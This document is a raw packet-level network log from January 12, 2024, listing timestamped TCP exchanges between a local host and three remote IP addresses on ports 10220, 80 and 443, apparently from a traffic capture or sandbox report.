                                                                                                                                                                      Jan 12, 2024 06:48:16.041356087 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041435957 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041454077 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041507006 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041601896 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041651011 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041755915 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041779041 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041817904 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041836977 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.041837931 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.041883945 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.042031050 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042052031 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042073965 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042083025 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.042112112 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.042113066 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.042283058 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042303085 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042339087 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.042368889 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.042454958 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042473078 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042489052 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042506933 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.042536020 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.042578936 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042602062 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042627096 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.042654991 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.042897940 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042915106 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042932034 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042948961 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.042973042 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043003082 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043190956 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043207884 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043225050 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043252945 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043252945 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043287039 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043375969 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043400049 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043416023 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043432951 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043447018 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043473005 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043492079 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043509007 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043524981 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043556929 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043581009 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043726921 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043750048 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043797970 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043884039 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043900967 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.043939114 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.043939114 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044006109 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044121027 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044173956 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044198990 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044214964 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044240952 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044240952 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044275045 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044320107 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044342995 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044365883 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044369936 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044399023 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044416904 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044496059 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044523954 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044547081 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044574022 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044600964 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044671059 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044691086 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044718027 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044744968 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044826031 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044843912 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.044886112 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.044995070 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045022011 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045047045 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.045077085 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.045137882 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045192957 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.045316935 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045347929 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045368910 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045397043 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.045423031 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.045510054 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045530081 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045564890 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.045588970 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.045773029 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045789957 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045813084 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045830011 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.045830011 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.045860052 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.045943022 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.045967102 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046010017 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046010971 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046103954 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046128988 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046156883 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046185970 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046274900 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046329021 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046443939 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046461105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046504974 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046504974 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046617985 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046642065 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046679020 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046679020 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046772003 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046793938 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046824932 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046854973 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.046961069 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.046992064 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.047008038 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.047015905 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.047043085 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.047043085 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.047219038 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.047241926 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.047271013 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.047300100 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.047391891 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.047446012 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.094557047 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.095181942 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.285423994 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.285501003 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.285526037 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.285593033 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.286447048 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.476713896 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.477179050 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.477410078 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.477976084 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.550493002 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.550561905 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.707010031 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.739228964 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.739274979 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.739316940 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.739372015 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.031239986 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.031583071 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.166292906 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.166913986 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.355356932 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.355381966 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.355456114 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.355690956 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.356101036 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.544591904 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.544941902 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.545598030 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.545598030 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.548032045 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.548032045 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:17.736402988 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:17.778825998 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.024849892 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.025185108 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.050591946 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.052402020 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.090867043 CET4975780192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.241223097 CET1022049754116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.242306948 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.242388010 CET4975410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.242579937 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.242831945 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.247828960 CET4975880192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.402314901 CET8049757175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.402394056 CET4975780192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.402801037 CET4975780192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.431035995 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.431653976 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.431725025 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.432001114 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.434159040 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:18.549952030 CET8049758175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.551659107 CET4975880192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.551820993 CET4975880192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.622961998 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.712251902 CET8049757175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.712452888 CET4975780192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.712532997 CET4975780192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.855025053 CET8049758175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.855233908 CET4975880192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.855233908 CET4975880192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:18.911195993 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:18.911501884 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.022156000 CET8049757175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.101753950 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.102283001 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.157852888 CET8049758175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.291779041 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.291804075 CET1022049755116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.292144060 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.292144060 CET4975510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.292669058 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.481400013 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.481829882 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.482140064 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.482558012 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.484266043 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:19.675662041 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.961793900 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:19.962049961 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.069261074 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.069783926 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.259042025 CET1022049760116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.259418964 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.259660006 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.260020971 CET1022049756116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.260109901 CET4975610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.448158979 CET1022049760116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.448353052 CET1022049760116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.448429108 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.448982000 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.451313972 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.453960896 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.642417908 CET1022049760116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.642568111 CET4976010220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.646008968 CET1022049761116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.646090031 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.647320986 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.822832108 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:20.822911978 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.823147058 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:20.833340883 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:20.833358049 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.835900068 CET1022049761116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.836357117 CET1022049761116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:20.836442947 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.836705923 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.838455915 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:20.841341972 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.026740074 CET1022049761116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.027556896 CET4976110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.029644966 CET1022049763116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.029745102 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.042965889 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.043087006 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.058397055 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.077491045 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.077526093 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.078466892 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.079564095 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.088953972 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.133940935 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.247627020 CET1022049763116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.247797012 CET1022049763116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.247896910 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.248128891 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.249922991 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.251782894 CET4976410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.439261913 CET1022049763116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.439332962 CET4976310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.441093922 CET1022049764116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.441174984 CET4976410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.441637039 CET4976410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.529284000 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.529366970 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.529423952 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.529474020 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.529486895 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.529542923 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.529546022 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.529592037 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.530282974 CET49762443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:21.530312061 CET44349762172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.631870985 CET1022049764116.202.0.196192.168.2.4
